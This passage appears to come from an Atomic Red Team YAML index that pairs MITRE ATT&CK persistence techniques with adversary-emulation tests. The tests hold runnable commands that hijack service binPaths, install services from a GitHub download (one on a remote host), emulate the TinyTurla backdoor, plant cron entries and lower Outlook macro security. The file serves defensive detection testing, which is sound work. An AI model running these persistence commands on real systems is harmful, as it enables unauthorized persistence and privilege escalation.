browser app stores, so it may not be difficult for malicious extensions to
defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending
on the browser, adversaries may also manipulate an extension's update url
to install updates from an adversary-controlled server or manipulate the mobile
configuration file to silently install additional extensions. \n\nAdversaries
may abuse how chromium-based browsers load extensions by modifying or replacing
the Preferences and/or Secure Preferences files to silently install malicious
extensions. When the browser is not running, adversaries can alter these files,
ensuring the extension is loaded, granted desired permissions, and will persist
in browser sessions. This method does not require user consent and extensions
are silently loaded in the background from disk or from the browser's trusted
store.(Citation: Pulsedive)\n \nPrevious to macOS 11, adversaries could silently
install browser extensions via the command line using the profiles
tool to install malicious .mobileconfig files. In macOS 11+,
the use of the profiles tool can no longer install configuration
profiles; however, .mobileconfig files can be planted and installed
with user interaction.(Citation: xorrior chrome extensions macOS) \n \nOnce
the extension is installed, it can browse to websites in the background, steal
all information that a user enters into a browser (including credentials),
and be used as an installer for a RAT for persistence.(Citation: Chrome Extension
Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google
Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) \n\nThere
have also been instances of botnets using a persistent backdoor through malicious
Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation:
Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also
use browser extensions to modify browser permissions and components, privacy
settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation:
Browers FriarFox)(Citation: Browser Adrozek) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Gordon Long, LegioX/Zoom, asaurusrex
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1542.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4
created: '2020-10-20T00:06:56.180Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1542/005
external_id: T1542.005
- source_name: Cisco Blog Legacy Device Attacks
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
- source_name: Cisco IOS Software Integrity Assurance - Secure Boot
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure
Boot. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35
- source_name: Cisco IOS Software Integrity Assurance - Image File Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Image File Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
- source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
- source_name: Cisco IOS Software Integrity Assurance - Command History
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
History. Retrieved October 21, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
- source_name: Cisco IOS Software Integrity Assurance - Boot Information
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:33.317Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.1'
atomic_tests: []
T1543.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32
created: '2020-01-17T19:13:50.402Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1543/003
external_id: T1543.003
- source_name: Microsoft Windows Event Forwarding FEB 2018
description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding
to help with intrusion detection. Retrieved August 7, 2018.
url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection
- source_name: ESET InvisiMole June 2020
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- source_name: SANS 1
description: Joshua Wright. (2020, October 13). Retrieved March 22, 2024.
url: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
- source_name: SANS 2
description: Joshua Wright. (2020, October 14). Retrieved March 22, 2024.
url: https://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/
- source_name: TechNet Services
description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
url: https://technet.microsoft.com/en-us/library/cc772408.aspx
- source_name: Microsoft 4697 APR 2017
description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service
was installed in the system. Retrieved August 7, 2018.'
url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697
- source_name: Symantec W.32 Stuxnet Dossier
description: Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February).
W32.Stuxnet Dossier. Retrieved December 7, 2020.
url: https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
- source_name: Unit42 AcidBox June 2020
description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare
Malware Repurposing Turla Group Exploit Targeted Russian Organizations.
Retrieved March 16, 2021.'
url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: Crowdstrike DriveSlayer February 2022
description: Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects
from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25,
2022.
url: https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:33.408Z'
name: 'Create or Modify System Process: Windows Service'
description: "Adversaries may create or modify Windows services to repeatedly
execute malicious payloads as part of persistence. When Windows boots up,
it starts programs or applications called services that perform background
system functions.(Citation: TechNet Services) Windows service configuration
information, including the file path to the service's executable or recovery
programs/commands, is stored in the Windows Registry.\n\nAdversaries may install
a new service or modify an existing service to execute at startup in order
to persist on a system. Service configurations can be set or modified using
system utilities (such as sc.exe), by directly modifying the Registry, or
by interacting directly with the Windows API. \n\nAdversaries may also use
services to install and execute malicious drivers. For example, after dropping
a driver file (ex: `.sys`) to disk, the payload can be loaded and registered
via [Native API](https://attack.mitre.org/techniques/T1106) functions such
as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()`
and `ZwSetValueKey()`), by creating the required service Registry values (i.e.
[Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using
command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet
Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42
AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s
to hide the presence of malicious activity on a system. Adversaries may also
load a signed yet vulnerable driver onto a compromised machine (known as \"Bring
Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege
Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole
June 2020)(Citation: Unit42 AcidBox June 2020)\n\nServices may be created
with administrator privileges but are executed under SYSTEM privileges, so
an adversary may also use a service to escalate privileges. Adversaries may
also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).\n\nTo
make detection analysis more challenging, malicious services may also incorporate
[Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004)
(ex: using a service and/or payload name related to a legitimate OS or benign
software component). Adversaries may also create ‘hidden’ services (i.e.,
[Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example
by using the `sc sdset` command to set service permissions via the Service
Descriptor Definition Language (SDDL). This may hide a Windows service from
the view of standard service enumeration methods such as `Get-Service`, `sc
query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- Pedro Harrison
- Mayuresh Dani, Qualys
- Wietze Beukema, @wietze
- Akshat Pradhan, Qualys
- Wirapong Petshagun
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.6'
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f
description: |
This test will temporarily modify the service Fax by changing the binPath to PowerShell
and will then revert the binPath change, restoring Fax to its original state.
Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
supported_platforms:
- windows
input_arguments:
service_name:
description: The name of the service that will be modified
type: string
default: Fax
service_binpath:
description: The default value for the binary path of the service
type: string
default: C:\WINDOWS\system32\fxssvc.exe
executor:
name: command_prompt
elevation_required: true
command: |
sc config #{service_name} binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start #{service_name}
cleanup_command: 'sc config #{service_name} binPath= "#{service_binpath}"
>nul 2>&1
'
- name: Service Installation CMD
auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
description: |
Download an executable from github and start it as a service.
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
supported_platforms:
- windows
input_arguments:
binary_path:
description: Name of the service binary, include path.
type: path
default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
service_type:
description: Type of service. May be own|share|interact|kernel|filesys|rec|userown|usershare
type: string
default: Own
startup_type:
description: Service start method. May be boot|system|auto|demand|disabled|delayed-auto
type: string
default: auto
service_name:
description: Name of the Service
type: string
default: AtomicTestService_CMD
dependency_executor_name: powershell
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
'
prereq_command: 'if (Test-Path "#{binary_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{binary_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
executor:
name: command_prompt
elevation_required: true
command: |
sc.exe create #{service_name} binPath= "#{binary_path}" start=#{startup_type} type=#{service_type}
sc.exe start #{service_name}
cleanup_command: |
sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1
- name: Service Installation PowerShell
auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77
description: |
Installs A Local Service via PowerShell.
Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.
supported_platforms:
- windows
input_arguments:
binary_path:
description: Name of the service binary, include path.
type: path
default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
service_name:
description: Name of the Service
type: string
default: AtomicTestService_PowerShell
dependency_executor_name: powershell
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
'
prereq_command: 'if (Test-Path "#{binary_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{binary_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
executor:
name: powershell
elevation_required: true
command: |
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
cleanup_command: |
Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
catch {}
- name: TinyTurla backdoor service w64time
auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940
description: |
It's running Dll as service to emulate the TinyTurla backdoor
[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
supported_platforms:
- windows
input_arguments:
dllfilename:
description: It specifies Dll file to run as service
type: string
default: "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll"
executor:
command: |-
copy "#{dllfilename}" %systemroot%\system32\
sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
sc config W64Time DisplayName= "Windows 64 Time"
sc description W64Time "Maintain date and time synch on all clients and services in the network"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
sc start W64Time
cleanup_command: |-
sc stop W64Time
sc.exe delete W64Time
del %systemroot%\system32\w64time.dll
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
name: command_prompt
elevation_required: true
- name: Remote Service Installation CMD
auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
description: |
Download an executable from github and start it as a service on a remote endpoint
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
supported_platforms:
- windows
input_arguments:
binary_path:
description: Name of the service binary, include path.
type: path
default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
service_type:
description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
type: string
default: Own
startup_type:
description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
type: string
default: auto
service_name:
description: Name of the Service
type: string
default: AtomicTestService_CMD
remote_host:
description: Name of the remote endpoint
type: string
default: localhost
dependency_executor_name: powershell
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
'
prereq_command: 'if (Test-Path "#{binary_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{binary_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
executor:
name: command_prompt
elevation_required: true
command: |
sc.exe \\#{remote_host} create #{service_name} binPath= "#{binary_path}" start=#{startup_type} type=#{service_type}
sc.exe \\#{remote_host} start #{service_name}
cleanup_command: |
sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
- name: Modify Service to Run Arbitrary Binary (Powershell)
auto_generated_guid: 1f896ce4-8070-4959-8a25-2658856a70c9
description: "This test will use PowerShell to temporarily modify a service
to run an arbitrary executable by changing its binary path and will then revert
the binary path change, restoring the service to its original state.\nThis
technique was previously observed through SnapMC's use of Powerspolit's invoke-serviceabuse
function. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)\n"
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of the service to modify
type: string
default: fax
new_bin_path:
description: Path of the new service binary
type: String
default: "$env:windir\\system32\\notepad.exe"
original_bin_path:
description: Path of the original service binary
type: String
default: "$env:windir\\system32\\fxssvc.exe"
executor:
command: |-
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{new_bin_path}"
start-service -Name "#{service_name}" -erroraction silentlycontinue | out-null
cleanup_command: |-
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{original_bin_path}" -erroraction silentlycontinue | out-null
name: powershell
elevation_required: true
T1053.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
created: '2019-12-03T14:25:00.538Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/003
external_id: T1053.003
- source_name: CloudSEK ESXiArgs 2023
description: Mehardeep Singh Sawhney. (2023, February 9). Analysis of Files
Used in ESXiArgs Ransomware Attack Against VMware ESXi Servers. Retrieved
March 26, 2025.
url: https://www.cloudsek.com/blog/analysis-of-files-used-in-esxiargs-ransomware-attack-against-vmware-esxi-servers
- source_name: 20 macOS Common Tools and Techniques
description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:33.856Z'
name: 'Scheduled Task/Job: Cron'
description: |-
Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). In ESXi environments, cron jobs must be created directly via the crontab file (e.g., `/var/spool/cron/crontabs/root`).(Citation: CloudSEK ESXiArgs 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- ESXi
x_mitre_version: '1.3'
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75
description: 'This test replaces the current user''s crontab file with the contents
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
'
supported_platforms:
- linux
- macos
input_arguments:
command:
description: Command to execute
type: string
default: "/tmp/evil.sh"
tmp_cron:
description: Temporary reference file to hold evil cron schedule
type: path
default: "/tmp/persistevil"
executor:
name: sh
command: |
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
cleanup_command: 'crontab /tmp/notevil
'
- name: Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
/etc/cron.monthly and /etc/cron.weekly folders configured to execute on a
schedule. This technique was used by the threat actor Rocke during the exploitation
of Linux web servers.
'
supported_platforms:
- macos
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
elevation_required: true
name: bash
command: |
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
cleanup_command: |
rm /etc/cron.daily/#{cron_script_name} -f
rm /etc/cron.hourly/#{cron_script_name} -f
rm /etc/cron.monthly/#{cron_script_name} -f
rm /etc/cron.weekly/#{cron_script_name} -f
- name: Cron - Add script to /etc/cron.d folder
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
description: 'This test adds a script to /etc/cron.d folder configured to execute
on a schedule.
'
supported_platforms:
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo '*/5 * * * * root echo "Hello
from Atomic Red Team"' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
elevation_required: true
name: sh
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
'
cleanup_command: 'rm /etc/cron.d/#{cron_script_name} -f
'
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
to execute on a schedule. This technique was used by the threat actor Rocke
during the exploitation of Linux web servers.
'
supported_platforms:
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in /var/spool/cron/crontabs folder
type: string
default: persistevil
executor:
elevation_required: true
name: bash
command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
'
cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -f
'
T1137:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1137
external_id: T1137
- source_name: Microsoft Detect Outlook Forms
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- source_name: SensePost Ruler GitHub
description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
services. Retrieved February 4, 2019.'
url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
url: https://github.com/sensepost/notruler
- source_name: Outlook Today Home Page
description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
Retrieved February 5, 2019.
url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:34.614Z'
name: Office Application Startup
description: |-
Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
- Sahar Shukrun
- Praetorian
- Loic Jaquemet
- Ricardo Dias
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Office Suite
x_mitre_version: '1.4'
identifier: T1137
atomic_tests:
- name: Office Application Startup - Outlook as a C2
auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c
description: "As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/
\nit is possible to use Outlook Macro as a way to achieve persistance and
execute arbitrary commands. This transform Outlook into a C2.\nToo achieve
this two things must happened on the syste\n- The macro security registry
value must be set to '1'\n- A file called VbaProject.OTM must be created in
the Outlook Folder.\n"
supported_platforms:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /t REG_DWORD /d 1 /f
mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1
echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /f >nul 2>&1
del %APPDATA%\Microsoft\Outlook\VbaProject.OTM >nul 2>&1
name: command_prompt
T1098.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3
created: '2020-01-19T16:59:45.362Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/003
external_id: T1098.003
- source_name: Expel AWS Attacker
description: " Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett.
(2022, April 5). Incident report: From CLI to console, chasing an attacker
in AWS. Retrieved April 7, 2022."
url: https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/
- source_name: Microsoft O365 Admin Roles
description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et.
al.. (2019, October 8). About admin roles. Retrieved October 18, 2019.
url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide
- source_name: AWS IAM Policies and Permissions
description: AWS. (n.d.). Policies and permissions in IAM. Retrieved April
1, 2022.
url: https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html
- source_name: Google Cloud IAM Policies
description: Google Cloud. (2022, March 31). Understanding policies. Retrieved
April 1, 2022.
url: https://cloud.google.com/iam/docs/policies
- source_name: Invictus IR DangerDev 2024
description: Invictus Incident Response. (2024, January 31). The curious case
of DangerDev@protonmail.me. Retrieved March 19, 2024.
url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Microsoft Support O365 Add Another Admin, October 2019
description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
- source_name: Rhino Security Labs AWS Privilege Escalation
description: Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods
and Mitigation. Retrieved May 27, 2022.
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:35.082Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
may update IAM policies in cloud-based environments or add a new global administrator
in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation:
Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin,
October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions,
a compromised account can gain almost unlimited access to data and settings
(including the ability to reset the passwords of other admins).(Citation:
Expel AWS Attacker)\n(Citation: Microsoft O365 Admin Roles) \n\nThis account
modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136)
or other malicious account activity. Adversaries may also modify existing
[Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have
compromised. This could lead to privilege escalation, particularly if the
roles added allow for lateral movement to additional accounts.\n\nFor example,
in AWS environments, an adversary with appropriate permissions may be able
to use the CreatePolicyVersion API to define a new version of
